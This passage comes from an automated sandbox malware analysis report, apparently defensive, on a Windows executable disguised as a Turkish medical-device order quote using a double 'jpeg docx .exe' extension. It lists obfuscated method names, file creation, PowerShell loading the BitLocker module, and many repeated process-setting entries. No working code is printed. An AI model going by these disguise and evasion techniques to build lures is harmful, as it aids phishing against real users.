                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, gmidj2cNCL2wet5hXQ.csHigh entropy of concatenated method names: 'ToString', 'pJftUUWn83', 'NYUtik1r0d', 'XoctCFLD2I', 'qV0t7PkCHw', 'tT0taxu3J2', 'gf0tpvvYZQ', 'h2Et4BSuUA', 'yNntL9WV0u', 'vjFtYeIv4x'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, NRxhwSPTNvsPRBrkqd.csHigh entropy of concatenated method names: 'ixLMRIG1hf', 'UQPMs0jtb0', 'njqMOXGah6', 'rwlMExyISr', 'AfeM6iO9Uc', 'klLOVhhWRw', 'lfiOxuI2IU', 'dtSONLBdWe', 'ltEOmIVuJo', 'N4OOFPIT7u'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, f5ePyPvdH5p24GQJZdb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RbFlqhuSTy', 'rs9l5UYCxi', 'veulX8XjP9', 'ySAlluETLe', 'WGulyK5xqi', 'i5ilrs04df', 'q6dlj0N8V0'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, nk8Xhvzxtd3d4u6euy.csHigh entropy of concatenated method names: 'pDo5nFg5Gr', 'fua5Gu3qEm', 'jbq5DE1M94', 'yWs5PieAsX', 'die5i2ZlE8', 'z0O57YkDUx', 'TyJ5awNKJl', 'egV5jHUVtD', 'M3A52yVeVS', 'ppm5kmZcVt'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, v8g6ZddC3lCTjYc3iv.csHigh entropy of concatenated method names: 'IYvvE8dtrg', 'X05v6KjZYh', 'Ax9vBiHKhu', 'TDCvQ0ODXj', 'h4EvoVXKRx', 'kwSvtTNvsP', 'viq9NgrwehF6HQPseP', 'Uwhw65LEq3GoYMOs5n', 'O3ZvvGu9nW', 'VFxvJPCQHm'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, uf2GKwx57yso2wIqxE.csHigh entropy of concatenated method names: 'IOQTmE4xXD', 'lKjT1SfBfb', 'e9Pfu1i0TV', 'l8Zfv0sykl', 'cFLTUyUyTg', 'tFGTHLvEuE', 'rD5Tw5Mcp9', 'tbOTW7GjIY', 'Ox1T08cRny', 'd5nTc8ujKq'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, vkBeaHsThZnGCCZ3M0.csHigh entropy of concatenated method names: 'Dispose', 'aHFvFYXbKM', 'o6CbieYSZu', 'PBOVfvuUYO', 'Tc6v1B9k2v', 'rrVvzyodwx', 'ProcessDialogKey', 'zc6buZ0OK0', 'RxIbvuZFXU', 'pPrbb3BigB'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, qpvGeyefD9uob6j8fe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EfRbF9frDV', 'iJSb1s1Aus', 'hXRbzJ1v3u', 'PdJJubyJuK', 'uRvJvYbXQp', 'e4gJbQvILH', 'mC5JJnAe0Q', 'sbesopUAsnY981Z7NTH'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, zN9WbEWhYZSyfwf2kO.csHigh entropy of concatenated method names: 'YxDoKf2vjr', 'mwtoH2SMbj', 'u86oWvgdFc', 'XTOo0iRZa9', 'SP2oiKfCxo', 'KxwoChNTpj', 'WGso7n1pn4', 'ySEoagwWN4', 'rPKopLHlxZ', 'TR4o4mVtf6'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, soRjZtNfAuHFYXbKMA.csHigh entropy of concatenated method names: 'xMkqo7Oyr2', 'JOdqTCQHX6', 'C4DqqilJAA', 'VPUqXm2eIF', 'sPhqyLGqFa', 'TC2qjd7N5l', 'Dispose', 'BqlfIntFFB', 'Q78fsPOkjB', 'MKyfeqGZHI'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, Qk7c4ZvvgTtspakYRdS.csHigh entropy of concatenated method names: 'K3551vpyBm', 'Pb45zQoH4J', 'mryXu4MEyp', 'MlcXvyNb3D', 'AiSXbLciB5', 'OsMXJ7kIkF', 'O3aXdfIUiR', 'kRxXRhVyqf', 'KQ7XI0Olla', 'XarXstOBkn'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, giyDf1wQ6NPrLyf3ny.csHigh entropy of concatenated method names: 'NEN8GpsGKt', 'udx8D2pYFJ', 'Mku8PgNAMg', 'okA8ilm1Rt', 'K9I87VrXbg', 'Ejg8aqNnr5', 'bIg84Z6RKa', 'pUf8LfOPVh', 'u0v8KPtsEn', 'pWF8U5KAFW'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, wBF35XAx0Xsv5T3FxK.csHigh entropy of concatenated method names: 'cPQTBraDbq', 'FMMTQYy3tk', 'ToString', 'yCKTIyxWWY', 'CMnTsdQitK', 'eexTeHKYqk', 'PioTOuVbrj', 'yq0TMN3QsE', 'EikTEik0Ed', 'WE3T6OX0xZ'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, aHcmq3Dx9iHKhucDC0.csHigh entropy of concatenated method names: 'prme3lWrp9', 'CGxenFvOxW', 'LqDeGMrBkX', 'urNeDAn8s2', 'KlaeoCUWxr', 'O8uetpRiEC', 'OLSeTvii2B', 'QGXefupPWQ', 'LmteqOVmx8', 'eAce5bn2eN'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, eyFoomvJ8JH2v5qQETX.csHigh entropy of concatenated method names: 'bvyX1fEGnG', 'KQvXzF0GJT', 'xNeluBr4pO', 'hsd3poR0NM7ZLFvl6G4', 'OY77rIRTOtK9fn7JST5', 'a8PYivRcARmH5QTlbxl', 'yglqwvRrCAYrCtvh7EE'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, PorFhk6DERu52uuEWI.csHigh entropy of concatenated method names: 'UJGJRZOGfl', 'ODPJIsnent', 'FtIJsls3S2', 'OZhJeh3gW2', 'ay5JOjhtdG', 'f5KJMtUb8v', 'ooHJEpGERP', 'zw6J6B58oD', 'xuRJhBIBDa', 'GZGJBfEE3J'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, kZ0OK0FWxIuZFXUtPr.csHigh entropy of concatenated method names: 'FsmqPTZ68L', 'Unmqin8g5V', 'mJmqC3HyZp', 'FdEq7HoKue', 'IyXqantoW5', 'YEbqp6eDaa', 'WBpq4sAnOJ', 'c07qL5PDXY', 'Gq0qYecNSC', 'xAgqKfkMPx'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, amUl0DYCqqPfJvXpQ6.csHigh entropy of concatenated method names: 'N8QE2ws8HJ', 'IcSEkC1nCE', 'MdaE9dVE03', 'WOCE3UyNpJ', 'SBYEgn0e12', 'YShEnlWCTZ', 'V1EEZIJGll', 'BO2EGeZ66K', 'FqcEDeayfO', 'N3SESehvQv'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, b8dtrgGm05KjZYhK3t.csHigh entropy of concatenated method names: 'WuHsWxioJ2', 'eZis0E1gn2', 'Ra7sc7wCUS', 'OWCsAE3KcV', 'bfFsVbfv87', 'v4Qsx3bAeb', 'PyLsN2Jcem', 'DdFsms6aGi', 'HT3sFcdUE0', 'wNCs1jy4Mg'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, JnLjBTbuhrmD7xf9Qp.csHigh entropy of concatenated method names: 'MOG9REmvw', 'NPx3weG7a', 'cO7nEae08', 'UnrZXjwGy', 'JYpDBhvBw', 'p0ZSAJA9h', 'eFDM0xacrZ1IVyoO8Z', 'lNFFXP38UEur561ImS', 'NxjfXOOfA', 'jRj5hFntT'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, iBEpXl4L3R0sGfJyZV.csHigh entropy of concatenated method names: 'M4WEI2AYQn', 'KKmEeGOMAV', 'rwXEMjlRVX', 'wkcM12V7XB', 'vW8Mzav90w', 'colEufEbb1', 'dpuEvNI1TX', 'EAjEbBLeZX', 'HqeEJG8aJI', 'clOEdc0bNO'
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx .exe
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx .exe
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx .exe
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx .exeJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx .exeJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx .exeJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
